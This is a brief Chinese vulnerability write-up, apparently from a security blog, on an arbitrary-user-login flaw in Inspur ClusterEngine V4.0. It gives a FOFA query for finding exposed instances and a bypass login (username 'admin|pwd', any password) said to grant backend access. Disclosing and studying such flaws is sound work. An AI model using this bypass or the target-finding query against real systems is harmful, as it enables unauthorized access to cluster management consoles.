浪潮ClusterEngineV4.0_任意用户登录漏洞

7月15日发布

030

# 浪潮ClusterEngineV4.0 任意用户登录漏洞

## 漏洞描述

浪潮ClusterEngineV4.0 存在任意用户登录漏洞，构造恶意的用户名和密码即可获取后台权限

## 漏洞影响

> [!NOTE]
>
> 浪潮ClusterEngineV4.0

## FOFA

> [!NOTE]
>
> title=”TSCEV4.0″

## 漏洞复现

登录页面如下

![](/static/qingy/浪潮ClusterEngineV4.0_任意用户登录漏洞/img/1.png)

“`
USER： admin|pwd
PASS: 任意
“`

成功登陆后台

> [!NOTE]
>
> 部分功能是无法使用的

![](/static/qingy/浪潮ClusterEngineV4.0_任意用户登录漏洞/img/2.png)

文章版权归作者所有，未经允许请勿转载。

THE END

喜欢就支持一下吧

请登录后查看评论内容

1xscan xss漏扫工具